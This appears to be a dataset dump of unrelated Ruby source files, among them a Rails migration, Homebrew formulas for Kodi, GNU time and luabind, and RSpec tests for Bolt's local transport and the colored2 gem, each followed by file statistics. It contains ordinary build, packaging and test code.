      # Special cases: Latin and Kirumb are looked up by ISO 639 code,
      # and a blank name maps to no language (NULL foreign key).
      if ["Latin", "", "Kirumb"].include? langname
        lang = case langname
               when "Latin"
                 Language.find_or_create_by_iso_639_code("la")
               when "Kirumb"
                 Language.find_or_create_by_iso_639_code("art-kirumb")
               when ""
                 nil
               end
      else
        lang = Language.find_or_create_by_default_name(langname)
      end
      # lang.try(:id) writes NULL for the blank-name case.
      Etymology.update_all(["original_language_id = ?", lang.try(:id)], ["source_language = ?", langname])
    end
  end
  remove_column :etymologies, :source_language
end
# Reverses #up: re-creates the string column and back-fills each
# etymology's textual language name from its associated Language.
def self.down
  # Fixed: add_column requires the column type as its third argument; the
  # original call omitted it and would raise ArgumentError on rollback.
  # The column holds language names, so restore it as a string.
  add_column :etymologies, :source_language, :string
  say_with_time "Restoring language names to etymologies..." do
    Language.find(:all).each do |lang|
      Etymology.update_all(["source_language = ?", lang.name], ["original_language_id = ?", lang.id])
    end
  end
  remove_column :etymologies, :original_language_id
end
end
| 31.439024 | 108 | 0.648565 |
ab563558a577f1ec744ee8859eea3131ac59aae0 | 523 | cask "kodi" do
version "18.7-Leia"
sha256 "88822a1a4aa3dba8959cf84a49fb65ec2dd93ab08fc38467bd8af927707ba153"
url "https://mirrors.kodi.tv/releases/osx/x86_64/kodi-#{version}-x86_64.dmg"
appcast "https://github.com/xbmc/xbmc/releases.atom"
name "Kodi"
homepage "https://kodi.tv/"
app "Kodi.app"
zap trash: [
"~/.kodi",
"~/Library/Application Support/Kodi",
"~/Library/Logs/kodi.log",
"~/Library/Logs/kodi.old.log",
"~/Library/Saved Application State/org.xbmc.kodi.savedState",
]
end
| 26.15 | 78 | 0.692161 |
01689dec6e2a698feed51a018ccfba6d92f95ded | 1,576 | class GnuTime < Formula
desc "GNU implementation of time utility"
homepage "https://www.gnu.org/software/time/"
url "https://ftpmirror.gnu.org/time/time-1.7.tar.gz"
mirror "https://ftp.gnu.org/gnu/time/time-1.7.tar.gz"
sha256 "e37ea79a253bf85a85ada2f7c632c14e481a5fd262a362f6f4fd58e68601496d"
bottle do
cellar :any_skip_relocation
revision 1
sha256 "3c998fed1b824483f0fd140a0b12164ebc6bd100371dca11291d3406a26ecc47" => :el_capitan
sha256 "d0b40a36430314f548ab3e5d362c3695b9ab38e83933a7a459deaccfa705232f" => :yosemite
sha256 "f69ffe3bd6748843ff7013c016bf69a58efde8fb936251b0f6e9e4a2352e1450" => :mavericks
sha256 "0b28fad39645760e643d90a93c994df01151d4ff43dc8b3c63efa8d59d17783f" => :mountain_lion
end
option "with-default-names", "Do not prepend 'g' to the binary"
# Fixes issue with main returning void rather than int
# https://trac.macports.org/ticket/32860
# https://trac.macports.org/browser/trunk/dports/sysutils/gtime/files/patch-time.c.diff?rev=88924
patch :DATA
def install
args = [
"--prefix=#{prefix}",
"--mandir=#{man}",
"--info=#{info}"
]
args << "--program-prefix=g" if build.without? "default-names"
system "./configure", *args
system "make", "install"
end
test do
system bin/"gtime", "ruby", "--version"
end
end
__END__
diff --git a/time.c b/time.c
index 9d5cf2c..97611f5 100644
--- a/time.c
+++ b/time.c
@@ -628,7 +628,7 @@ run_command (cmd, resp)
signal (SIGQUIT, quit_signal);
}
-void
+int
main (argc, argv)
int argc;
char **argv;
| 28.142857 | 99 | 0.708122 |
bbfbf90ba04ea945260a07c34fed272dc844ca52 | 398 | module Outpost
module Secretary
# Controller concern that stamps the logged-in user's id onto incoming
# resource params for create/update, so Secretary can attribute versions.
module UserInjection
  extend ActiveSupport::Concern

  included do
    # Legacy Rails callback API (before_filter); runs only on writes.
    before_filter :add_user_id_to_params, only: [:create, :update]
  end

  private

  # Merges logged_user_id into the resource's param hash when the model
  # is managed by Secretary. `model`, `current_user` and
  # `singular_route_key` are presumably provided by the host controller —
  # TODO confirm.
  def add_user_id_to_params
    if model.has_secretary?
      params[model.singular_route_key].merge!(logged_user_id: current_user.id)
    end
  end
end
end
end
| 19.9 | 82 | 0.663317 |
613c78a2503e6889c8cddd755a54014ecfa9672b | 3,682 | class Luabind < Formula
desc "Library for bindings between C++ and Lua"
homepage "https://github.com/luabind/luabind"
url "https://downloads.sourceforge.net/project/luabind/luabind/0.9.1/luabind-0.9.1.tar.gz"
sha256 "80de5e04918678dd8e6dac3b22a34b3247f74bf744c719bae21faaa49649aaae"
license "MIT"
revision 2
bottle do
cellar :any
sha256 "aa095d38915e09287c86d11d65871b5a4e6604799a961f0e055c9bf526ba403b" => :mojave
sha256 "736bb4cb6a49338eecab9a179f3104e8328d7133366b921b2fece14b6fd2aa26" => :high_sierra
sha256 "39e74593d47fd648230e177e9a8a90e1b3a888c84d6c7d38f358265d5b93ce94" => :sierra
sha256 "914a79679264790d9ffb0726a1f303954d816da3dd23db3b8816873cf467677f" => :el_capitan
sha256 "171123f48a6cf2431d6b143b84bf31dbb955f103195aa30597a61b7a61943982" => :yosemite
end
depends_on "boost-build" => :build
depends_on "boost"
depends_on "[email protected]"
# boost 1.57 compatibility
# https://github.com/Homebrew/homebrew/pull/33890#issuecomment-67723688
# https://github.com/luabind/luabind/issues/27
patch do
url "https://gist.githubusercontent.com/tdsmith/e6d9d3559ec1d9284c0b/raw/4ac01936561ef9d7541cf8e78a230bebef1a8e10/luabind.diff"
sha256 "f22a283752994e821922316a5ef3cbb16f7bbe15fc64d97c02325ed4aaa53985"
end
# patch Jamroot to perform lookup for shared objects with .dylib suffix
patch do
url "https://gist.githubusercontent.com/DennisOSRM/3728987/raw/052251fcdc23602770f6c543be9b3e12f0cac50a/Jamroot.diff"
sha256 "bc06d76069d08af4dc55a102f963931a0247173a36ad0ae43e11d82b23f8d2b3"
end
# apply upstream commit to enable building with clang
patch do
url "https://github.com/luabind/luabind/commit/3044a9053ac50977684a75c4af42b2bddb853fad.diff?full_index=1"
sha256 "d04cbe7e5ed732943b1caf547321ac81b1db49271a5956a5f218905016c8900e"
end
# include C header that is not pulled in automatically on OS X 10.9 anymore
# submitted https://github.com/luabind/luabind/pull/20
patch do
url "https://gist.githubusercontent.com/DennisOSRM/a246514bf7d01631dda8/raw/0e83503dbf862ebfb6ac063338a6d7bca793f94d/object_rep.diff"
sha256 "2fef524ac5e319d7092fbb28f6d4e3d3eccd6a570e7789a9b5b0c9a25e714523"
end
def install
ENV["LUA_PATH"] = Formula["[email protected]"].opt_prefix
args = %w[release install]
case ENV.compiler
when :clang
args << "--toolset=clang"
when :gcc
args << "--toolset=darwin"
end
args << "--prefix=#{prefix}"
system "bjam", *args
(lib/"pkgconfig/luabind.pc").write pc_file
end
def pc_file
<<~EOS
prefix=#{HOMEBREW_PREFIX}
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${exec_prefix}/include
Name: luabind
Description: Library for bindings between C++ and Lua
Version: 0.9.1
Libs: -L${libdir} -lluabind
Cflags: -I${includedir}
EOS
end
test do
(testpath/"hello.cpp").write <<~EOS
extern "C" {
#include <lua.h>
}
#include <iostream>
#include <luabind/luabind.hpp>
void greet() { std::cout << "hello world!\\n"; }
extern "C" int init(lua_State* L)
{
using namespace luabind;
open(L);
module(L)
[
def("greet", &greet)
];
return 0;
}
EOS
system ENV.cxx, "-shared", "hello.cpp", "-o", "hello.dylib",
"-I#{Formula["[email protected]"].include}/lua-5.1",
"-L#{lib}", "-lluabind",
"-L#{Formula["[email protected]"].lib}", "-llua5.1"
output = `lua5.1 -e "package.loadlib('#{testpath}/hello.dylib', 'init')(); greet()"`
assert_match "hello world!", output
end
end
| 34.411215 | 137 | 0.695274 |
874401c65beb2089a5a4349d0781ddb19b2cc228 | 530 | require File.expand_path('../../../spec_helper', __FILE__)
# mspec guard: Fixnum#odd? exists from Ruby 1.9 onward.
# Covers zero, even/odd, and positive/negative operands.
ruby_version_is "1.9" do
  describe "Fixnum#odd?" do
    it "is false for zero" do
      0.odd?.should be_false
    end

    it "is false for even positive Fixnums" do
      4.odd?.should be_false
    end

    it "is false for even negative Fixnums" do
      (-4).odd?.should be_false
    end

    it "is true for odd positive Fixnums" do
      5.odd?.should be_true
    end

    it "is true for odd negative Fixnums" do
      (-5).odd?.should be_true
    end
  end
end
| 20.384615 | 58 | 0.630189 |
871ed314cd38f09fe42bad7f37a728344c664815 | 5,516 | # frozen_string_literal: true
require 'spec_helper'
require 'bolt/transport/local'
require 'bolt/target'
require 'bolt/inventory'
require 'bolt/util'
require 'bolt_spec/transport'
require 'bolt_spec/conn'
require 'shared_examples/transport'
# Integration specs for Bolt's local transport: shared transport-API
# examples plus run-as/sudo escalation and large/slow-I/O edge cases.
describe Bolt::Transport::Local do
  include BoltSpec::Transport

  # Fixture wiring: localhost target built from an empty inventory with
  # default transport config; `user`/`password` match the CI sudo account.
  let(:transport) { :local }
  let(:host_and_port) { 'localhost' }
  let(:safe_name) { host_and_port }
  let(:user) { 'runner' }
  let(:password) { 'runner' }
  let(:os_context) { Bolt::Util.windows? ? windows_context : posix_context }
  let(:config) { make_config }
  let(:project) { Bolt::Project.new('.') }
  let(:plugins) { Bolt::Plugin.setup(config, nil) }
  let(:inventory) { Bolt::Inventory.create_version({}, config.transport, config.transports, plugins) }
  let(:target) { make_target }
  let(:transport_config) { {} }

  # Resolves the localhost target through the inventory.
  def make_target
    inventory.get_target(host_and_port)
  end

  # The local transport has no connection to establish.
  it 'is always connected' do
    expect(runner.connected?(target)).to eq(true)
  end

  include_examples 'transport api'

  context 'running as another user', sudo: true do
    include_examples 'with sudo'

    # run-as 'root' configured, but each example overrides back to `user`.
    context "overriding with '_run_as'" do
      let(:transport_config) do
        {
          'sudo-password' => password,
          'run-as' => 'root'
        }
      end

      it "can override run_as for command via an option" do
        expect(runner.run_command(target, 'whoami', run_as: user)['stdout']).to eq("#{user}\n")
      end

      it "can override run_as for script via an option" do
        contents = "#!/bin/sh\nwhoami"
        with_tempfile_containing('script test', contents) do |file|
          expect(runner.run_script(target, file.path, [], run_as: user)['stdout']).to eq("#{user}\n")
        end
      end

      it "can override run_as for task via an option" do
        contents = "#!/bin/sh\nwhoami"
        with_task_containing('tasks_test', contents, 'environment') do |task|
          expect(runner.run_task(target, task, {}, run_as: user).message).to eq("#{user}\n")
        end
      end

      it "can override run_as for file upload via an option" do
        contents = "upload file test as root content"
        dest = '/tmp/root-file-upload-test'
        with_tempfile_containing('tasks test upload as root', contents) do |file|
          expect(runner.upload(target, file.path, dest, run_as: user).message).to match(/Uploaded/)
          expect(runner.run_command(target, "cat #{dest}", run_as: user)['stdout']).to eq(contents)
          expect(runner.run_command(target, "stat -c %U #{dest}", run_as: user)['stdout'].chomp).to eq(user)
          # NOTE(review): 'docker' group assumption is specific to the CI image.
          expect(runner.run_command(target, "stat -c %G #{dest}", run_as: user)['stdout'].chomp).to eq('docker')
        end
        # Cleanup of the uploaded file.
        runner.run_command(target, "rm #{dest}", sudoable: true, run_as: user)
      end
    end

    # Escalation without a sudo password must fail loudly, not hang.
    context "as user with no password" do
      let(:transport_config) do
        {
          'run-as' => 'root'
        }
      end

      it "returns a failed result when a temporary directory is created" do
        contents = "#!/bin/sh\nwhoami"
        with_tempfile_containing('script test', contents) do |file|
          expect {
            runner.run_script(target, file.path, [])
          }.to raise_error(Bolt::Node::EscalateError,
                           "Sudo password for user #{user} was not provided for #{host_and_port}")
        end
      end
    end
  end

  # Exercises ~1MB of stdin/stdout/stderr through a task to catch pipe
  # buffering/deadlock regressions.
  context 'with large input and output' do
    let(:file_size) { 1011 }
    let(:str) { (0...1024).map { rand(65..90).chr }.join }
    let(:arguments) { { 'input' => str * file_size } }
    let(:ruby_task) do
      <<~TASK
        #!/usr/bin/env ruby
        input = STDIN.read
        STDERR.print input
        STDOUT.print input
      TASK
    end

    it "runs with large input and captures large output" do
      with_task_containing('big_kahuna', ruby_task, 'stdin', '.rb') do |task|
        result = runner.run_task(target, task, arguments).value
        expect(result['input'].bytesize).to eq(file_size * 1024)
        # Ensure the strings are the same
        expect(result['input'][-1024..-1]).to eq(str)
      end
    end

    context 'with run-as', sudo: true do
      let(:transport_config) do
        {
          'sudo-password' => password,
          'run-as' => 'root'
        }
      end

      it "runs with large input and output" do
        with_task_containing('big_kahuna', ruby_task, 'stdin', '.rb') do |task|
          result = runner.run_task(target, task, arguments).value
          expect(result['input'].bytesize).to eq(file_size * 1024)
          expect(result['input'][-1024..-1]).to eq(str)
        end
      end
    end

    # A task that drains stdin slowly, to catch write-side blocking.
    context 'with slow input' do
      let(:file_size) { 10 }
      let(:ruby_task) do
        <<~TASK
          #!/usr/bin/env ruby
          while true
          begin
          input = STDIN.readpartial(1024)
          sleep(0.2)
          STDERR.print input
          STDOUT.print input
          rescue EOFError
          break
          end
          end
        TASK
      end

      it "runs with large input and captures large output" do
        with_task_containing('slow_and_steady', ruby_task, 'stdin', '.rb') do |task|
          result = runner.run_task(target, task, arguments).value
          expect(result['input'].bytesize).to eq(file_size * 1024)
          # Ensure the strings are the same
          expect(result['input'][-1024..-1]).to eq(str)
        end
      end
    end
  end
end
| 32.447059 | 113 | 0.59826 |
3918e35e952ce0d4206e3898a16f7918106a3a55 | 201 | # frozen_string_literal: true
class AgendasController < ApplicationController
def show
@rooms = Room.all
@days = AgendaDay.all.includes(times: { agendas: %i[room speakers tags] })
end
end
| 22.333333 | 78 | 0.726368 |
62562546851844eea8b98f1718dd36dd6c45ddc3 | 565 | require File.expand_path('spec/spec_helper')
require 'colored2/object'
# Fixtures built via the global color helpers mixed into Object by
# colored2/object: plain color, color-on-color, and background-only.
subject1 = red('hello')
subject2 = red('blue').on.blue
subject3 = on.yellow('on yellow')

RSpec.describe Object do
  describe 'with foreground and background colors' do
    it 'should work with one color' do
      expect(subject1).to eql('hello'.red)
    end

    it 'should work with color on color' do
      expect(subject2).to eql('blue'.red.on.blue)
    end

    it 'should add background color using on_<color>' do
      expect(subject3).to eql('on yellow'.on.yellow)
    end
  end
end
| 22.6 | 56 | 0.688496 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.